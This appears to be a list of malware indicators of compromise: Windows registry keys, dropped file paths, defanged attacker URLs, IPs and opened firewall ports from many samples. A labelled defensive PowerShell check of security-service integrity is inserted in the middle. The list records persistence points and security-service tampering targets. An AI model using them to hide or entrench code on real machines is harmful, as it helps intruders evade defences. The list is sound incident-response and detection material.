HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WMDMPMSP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NWSAPAGENT
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NWCWORKSTATION
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IRMON
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IPRIP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IAS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_6TO4
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
%WinDir%\sp.htm
%System%\net.vbs
%System%\launch.vbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MessengerService\Policies
C:\windows\sp.htm
HKEY_CURRENT_USER\Identities\Software\Microsoft\Outlook Express\5.0\signatures
HKEY_CURRENT_USER\Software\Patchou
c:\windows\system32\userinit.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows
HKEY_CURRENT_USER\Software\Classes\.exe\DefaultIcon
HKEY_CURRENT_USER\Software\Classes\pezfile
HKEY_CLASSES_ROOT\pezfile
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\URL\Prefixes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main
hXXp://VVV.mavideniz.gen.tr
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TCPIP Pass-through Filter
TCPIP Pass-through Filter
HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SESSION MANAGER
HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SESSION MANAGER\GFI_BC_PT_RegKeyToBeDeleted
HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SESSION MANAGER\GFI_BC_PT_RegKeyCreated
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\GFI_BC_PT_RegKeyToBeDeleted
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\GFI_BC_PT_RegKeyCreated
C:\GFI_BC_PT_FolderToBeDeleted
C:\GFI_BC_PT_FolderCreated
C:\GFI_BC_CleanFile.txt
C:\GFI_BC_PT_FileCreated.txt
C:\GFI_BC_PT_FileToBeDeleted.txt
Administrator1\winlogon.exe
Default_Search_URL
Default_Page_URL
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr
HKEY_CURRENT_USER\Control Panel\Sound
%System%\drivers\etc\hosts
%SYSTEM%\drivers\etc\hosts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\Current\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter
HKEY_CURRENT_USER\Software\mdnkso81qq2
HKEY_CLASSES_ROOT\VBEfile\shell\Open
HKEY_CLASSES_ROOT\VBSfile\shell\Open
HKEY_CLASSES_ROOT\regfile\shell\Merge
HKEY_CLASSES_ROOT\inffile\shell\Install
HKEY_CLASSES_ROOT\lnkfile\shell\Delete
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden
hXXp://VVV.bendot.co.nr
HKEY_CURRENT_USER\Software\Classes\exefile
HKEY_CURRENT_USER\Software\Classes\exefile\shell
HKEY_CURRENT_USER\Software\Classes\exefile\DefaultIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore
%System%\MS586.sys
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sessmgr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msiexec.exe
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SuperHidden
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\ShowFullPathAddress
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\ShowFullPath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\HideFileExt
%PROFILE%\Start Menu\Programs\Windows XP Recovery
%PROFILE%\Start Menu\Programs\Windows XP Recovery\Uninstall Windows XP Recovery.lnk
%PROFILE%\Start Menu\Programs\Windows XP Recovery\Windows XP Recovery.lnk
%DESKTOPDIRECTORY%\Windows XP Recovery.lnk
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Control Panel\Desktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
CertificateRevocation
WarnonBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache
@shell32.dll,-21785
HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug
cmd.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
%system%\userinit.exe,
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile\shell\open\command
HKEY_CURRENT_USER\Control Panel\International
%system%\logon.scr
@%SystemRoot%\system32\SHELL32.dll,-8964
HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
@%SystemRoot%\system32\SHELL32.dll,-9216
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
A%system%\drivers\etc\hosts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{08B0E5C0-4FCB-11CF-ABX5-00401C608512}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-11CF-AAX5-81CX1C635853}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
fbdirecto.net/1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess
Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.
The WSCSVC (Windows Security Center) service monitors and reports security health settings on the computer. The health settings include firewall (on/off), antivirus (on/off/out of date), antispyware (on/off/out of date), Windows Update (automatically/manually download and install updates), User Account Control (on/off), and Internet settings (recommended/not recommended). The service provides COM APIs for independent software vendors to register and record the state of their products to the Security Center service. The Action Center (AC) UI uses the service to provide systray alerts and a graphical view of the security health states in the AC control panel. Network Access Protection (NAP) uses the service to report the security health states of clients to the NAP Network Policy Server to make network quarantine decisions. The service also has a public API that allows external consumers to programmatically retrieve the aggregated security health state of the system.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wscsvc\Parameters
%SystemRoot%\System32\wscsvc.dll
%SystemRoot%\System32\svchost.exe -k LocalServiceNetworkRestricted
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wscsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend\Parameters
%ProgramFiles%\Windows Defender\mpsvc.dll
Windows Defender
%SystemRoot%\System32\svchost.exe -k secsvcs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters
%SYSTEM%\wuauserv.dll
%systemroot%\system32\svchost.exe -k netsvcs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv
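The keys above are the service definitions of Windows Security Center (wscsvc), Windows Defender (WinDefend) and Windows Update (wuauserv), each with its Parameters\ServiceDll and svchost host group. A service is silenced either by setting Start to 4 (Disabled) or by re-pointing ServiceDll or ImagePath at other code, so the check a responder wants is whether those values still resolve to enabled, Microsoft-signed binaries. The script below does that; it is an added example and is not part of the Lavasoft report. The only assumption is the list of service names; version-specific paths are deliberately not hard-coded, because the paths recorded above belong to the Windows 7 analysis host. Get-AuthenticodeSignature consults the system catalog only on newer Windows releases, so on older hosts a catalog-signed Microsoft DLL may show as NotSigned; that is a limitation of the cmdlet, not evidence of tampering, and should be rechecked with sigcheck or signtool.

```powershell
# Added example, not part of the Lavasoft report: verify that the security services whose
# registry definitions the sample reads (wscsvc, WinDefend, wuauserv) are still enabled and
# still point at Microsoft-signed binaries. Assumption: only the list of service names.
$Services = 'wscsvc', 'WinDefend', 'wuauserv'

# Pull the executable out of an ImagePath such as
#   %SystemRoot%\System32\svchost.exe -k LocalServiceNetworkRestricted
#   "C:\Program Files\Vendor\svc.exe" /arg
function Get-ImagePathExe {
    param([string]$ImagePath)
    if ($ImagePath -match '^\s*"?(?<exe>[^"]+?\.exe)"?') {
        return [Environment]::ExpandEnvironmentVariables($Matches.exe)
    }
    return $null
}

# 'ok' when the file exists, carries a valid Authenticode/catalog signature and the signer
# is Microsoft; otherwise a short reason string for the report.
function Test-SignedByMicrosoft {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return 'missing' }
    $sig = Get-AuthenticodeSignature -LiteralPath $Path
    if ($sig.Status -ne 'Valid') { return "signature $($sig.Status)" }
    if ($sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') {
        return "signer $($sig.SignerCertificate.Subject)"
    }
    return 'ok'
}

function Get-SecurityServiceReport {
    foreach ($name in $Services) {
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$name"
        $findings = New-Object System.Collections.Generic.List[string]
        if (-not (Test-Path -LiteralPath $key)) {
            $findings.Add('service key missing')
        } else {
            $svc = Get-ItemProperty -LiteralPath $key
            # Start: 2 = Automatic, 3 = Manual, 4 = Disabled
            if ($svc.Start -eq 4) { $findings.Add('Start=4 (Disabled)') }
            $exe = Get-ImagePathExe -ImagePath $svc.ImagePath
            if (-not $exe) {
                $findings.Add("unparseable ImagePath '$($svc.ImagePath)'")
            } else {
                $r = Test-SignedByMicrosoft -Path $exe
                if ($r -ne 'ok') { $findings.Add("ImagePath $exe : $r") }
            }
            # svchost-hosted services load the DLL named in Parameters\ServiceDll; that
            # value, not ImagePath, is where such a service is re-pointed at foreign code.
            $params = Get-ItemProperty -LiteralPath "$key\Parameters" -ErrorAction SilentlyContinue
            if ($params -and $params.ServiceDll) {
                $dll = [Environment]::ExpandEnvironmentVariables($params.ServiceDll)
                $r = Test-SignedByMicrosoft -Path $dll
                if ($r -ne 'ok') { $findings.Add("ServiceDll $dll : $r") }
            }
        }
        [pscustomobject]@{
            Service  = $name
            Findings = if ($findings.Count) { $findings -join '; ' } else { 'no deviation' }
        }
    }
}

Get-SecurityServiceReport | Format-Table -AutoSize
```

Extend $Services with MpsSvc, SharedAccess or sr to cover the firewall and System Restore keys that appear further down this list; the checks are the same.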
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RapportSetup.exe
RPXService.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RapportSetup-Full.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RapportService.exe
RPService.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RapportMgmtService.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MyEze.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eze
HKEY_CLASSES_ROOT\MyEze.1
HKEY_CLASSES_ROOT\.eze
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\desktop.ini
%DESKTOPDIRECTORY%\System_Check.lnk
%DESKTOPDIRECTORY%\SMART_HDD.lnk
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
rundll32.exe
lsass.exe
%STARTUP%\msconfig.lnk
%STARTUP%\runctf.lnk
%STARTUP%\ctfmon.lnk
services.exe_
%WINDOWS%\winsxs\Backup\
%WINDOWS%\Installer\
%WINDOWS%\assembly\GAC_64\Desktop.ini
%WINDOWS%\assembly\GAC_32\Desktop.ini
%WINDOWS%\assembly\GAC\Desktop.ini
HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}
%WINDOWS%\system32\services.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\10.0\Excel\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\11.0\Excel\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Excel\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Excel\Security
hXXp://tours.kichwas-ecuador.com/
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
prosqlserv40001.bak
prosqlserv4.dll
HKEY_CLASSES_ROOT\CLSID\{8BCBB738-FCFA-F17F-134C-1167371C59F7}
HKEY_LOCAL_MACHINE\SOFTWARE\Licenses
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BCBB738-FCFA-F17F-134C-1167371C59F7}
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions\cdjbnddbclciabnckgeahmneohjlahdm
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\chrome\Extensions\cdjbnddbclciabnckgeahmneohjlahdm
HKCU\Software\Microsoft\Windows\CurrentVersion
%COMMON_APPDATA%
%PROGRAMS%\System Progressive Protection\System Progressive Protection.lnk
%DESKTOPDIRECTORY%\System Progressive Protection.lnk
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
C:\PROGRA~3\LOCALS~1\Temp\msnato.exe
jeema.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
HKEY_LOCAL_MACHINE\Software\KHATRA\Startup_List
NoUnsafeTypeCautionForEXE
Software\Microsoft\Windows NT\CurrentVersion\Windows
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\System
%LOCAL_APPDATA%\Microsoft\CD Burning\autorun.inf
%COMMON_STARTUP%\(Empty).lnk
%WINDOWS%\Youtube.cab
%WINDOWS%\supermodels.cab
%WINDOWS%\new-screamsaver.com.cab
%WINDOWS%\New WinZip File.cab
%WINDOWS%\New WinRAR ZIP archive.cab
%WINDOWS%\New WinRAR archive.cab
%WINDOWS%\mario675.cab
%WINDOWS%\kavSetupEng3857.cab
%WINDOWS%\fh_antivirussetup6534.cab
%WINDOWS%\CyberWar.cab
%WINDOWS%\K.Backup
HKEY_LOCAL_MACHINE\SOFTWARE\rising
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
\srvany.exe
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot
%WINDOWS%\ShellNew
bron.tok
HKEY_LOCAL_MACHINE\Software\Classes\MIDfile\shell\play\command
HKEY_LOCAL_MACHINE\Software\Classes\txtfile\shell\open\command
%WINDOWS%\system\explorer.exe
%WINDOWS%\system\fndfst32.exe
%WINDOWS%\system\applets.exe
%WINDOWS%\system\mplayerw.exe
%WINDOWS%\system\Sysexp32.exe
%WINDOWS%\Help\intret.cnt
%WINDOWS%\Syssrc32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\
XX--XX--XX.txt
UuU.uUu
XxX.xXx
index.exe
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{NH8ONC0M-V2S2-AQ8L-8OGF-WNY1SA685WDT}
HKEY_CURRENT_USER\SOFTWARE\E&BA09AZL
%TEMP%\0sexy.jpg.exe
%TEMP%\0sexy.jpg
%APPDATA%\Microsoft\Windows\E&bA09AzL.cfg
%APPDATA%\Microsoft\Windows\E&bA09AzL.dat
%SYSTEM%\zlib.dll
%SYSTEM%\tcphost.tmp
%SYSTEM%\tcphost.ini
HKEY_CURRENT_USER\SOFTWARE\oSTDyTHg
%LOCAL_SETTINGS%\Temp\aviso.bak
HKEY_CURRENT_USER\SOFTWARE\gjm4Yw1WM
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5S15K25F-2471-O311-2B56-1HL8G5821ACD}
HKEY_CURRENT_USER\Software\Classes\VirtualStore\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5S15K25F-2471-O311-2B56-1HL8G5821ACD}
%WINDOWS%\832images.jpg.exe
%TEMP%\832images.jpg
%WINDOWS%\832images.jpg
%APPDATA%\Microsoft\Windows\gjm4Yw1WM.cfg
%APPDATA%\Microsoft\Windows\gjm4Yw1WM.dat
\%SYSTEM%\lncom_.jpg
%WINDOWS%\ktd32.atm
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srservice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr\Parameters
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432node\Microsoft\Windows NT\CurrentVersion\Winlogon
DirectX For Microsoft Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag
%WINDOWS%\system\
%SYSTEM%\
sservice.exe
reginv.dll
fservice.exe
winkey.dll
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432node\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432node\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
%LOCAL_SETTINGS%\TEMP\w5vpouUpqc.txt
%LOCAL_SETTINGS%\TEMP\wboy.txt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{22d7f312-b0f6-11d2-94ab-0080c33c7e95}
HKEY_LOCAL_MACHINE\SOFTWARE\Google\SpoolCDS
HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\CommonFiles
Software\Mozilla\Firefox
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
\Documents\ntuser{4CB43D7F-7EEE-4906-8698-60DA70737200}.pol
%COMMON_DESKTOPDIRECTORY%
%SYSTEM%\SourceSystem
%SYSTEM%\SourceSystem\logs.dat
MozillaUpdate
%SYSTEM%\SourceSystem\Syscheck.exe
Microsoft Windows
%APPDATA%\svchost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\
MSDCSC\msdcsc.exe
\```````````````````````````.JPG
\```````.JPG
userinit.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_CURRENT_USER\Software\DC3_FEXEC
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
%APPDATA%\system32\system.exe
%SYSTEMROOT%\SysWoW64\system32\system.exe
%SYSTEMROOT%\system32\system32\system.exe
Microsoft\lsass.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
\HKCU\Software\WOW6432node\Microsoft\Windows\CurrentVersion\Run
%WINDOWS%\
%WINDOWS%\SYSWOW64\
setup.ini
winhelp.ini
winhelp.exe
regsvr.exe
rundll.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\singaraja eto les lubi sebua polnostu
%Program Files%\sri teplim kalom\singaraja eto les\sobaki_ya_edu_vas_ebat.yahaha
%Program Files%\sri teplim kalom\singaraja eto les\sleep_my_darling_sleppp.vbs
%Program Files%\sri teplim kalom\singaraja eto les\sleep_my_darling_sleppp.lll
%Program Files%\sri teplim kalom\singaraja eto les\net_v_zizni_nehera_etogo_kak_ego_o_stastia.jog
%Program Files%\sri teplim kalom\singaraja eto les\Uninstall.ini
%Program Files%\sri teplim kalom\singaraja eto les\Uninstall.exe
HKCU\Software\WOW6432node\Microsoft\Windows\CurrentVersion\Run
msdcsc.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{4JFT3224-0O8K-7ONV-CHFJ-5U18T0P61VRW}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{4JFT3224-0O8K-7ONV-CHFJ-5U18T0P61VRW}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{TML0304K-328R-7856-T8O1-V57227U3M100}
Software\Microsoft\Active Setup\Installed Components\{TML0304K-328R-7856-T8O1-V57227U3M100}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{TML0304K-328R-7856-T8O1-V57227U3M100}
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{TML0304K-328R-7856-T8O1-V57227U3M100}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wuauserv
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\luafv
\HKCU\Software\Microsoft\Windows\CurrentVersion\Run
32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus
HKCU\Software\Policies\Microsoft\Windows\System
HKCU\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\sr
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile
IsShortcut
HKLM\System\CurrentControlSet\Control\Session Manager\AppCertDlls
asr_skey
%SYSTEM%\findsink.dll
%SYSTEM%\mqsvgsvc.dll
%SYSTEM%\cmdlvert.dll
\HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
.tmp.exe
%WINDOWS%\system64
Windows
HKEY_LOCAL_MACHINE\SYSTEM\Select
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet00X\Control\Session Manager\SubSystems
Windows Defender\
%APPDATA%\postclean.bat
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
winhlp32.exe
twunk_32.exe
%Documents and Settings%\Administrator\Desktop\DisplaySwitch.exe
mdcsc.exe
HKCU\Software\DC3_FEXEC
%DESKTOPDIRECTORY%\Internet Security PRO.lnk
HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
\HKLM\System\CurrentControlSet\Services\Tcpip\Parameters
MaxUserPort
{310DE29C-0AD3-4A43-A2DB-221F1160CACB}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlogon
HKCU\Software\Microsoft\Internet Explorer\New Windows
HKCU\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths
WindowsStart
taskhost.exe
\HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CLASSES_ROOT\S7.Document\shell\printto\command
HKEY_CLASSES_ROOT\S7.Document\shell\print\command
HKEY_CLASSES_ROOT\S7.Document\shell\open\command
HKEY_CLASSES_ROOT\S7.Document\DefaultIcon
%COMMON_APPDATA%\Dirty
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system
216.146.36.240
216.146.35.240
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
3838:TCP
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\
4421:UDP
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\??\%System%\hide.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ialdnwxf\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ialdnwxf\Security\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ialdnwxf\Enum\
HKEY_CLASSES_ROOT\comfile\shell\open\command
rund1132.exe %1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
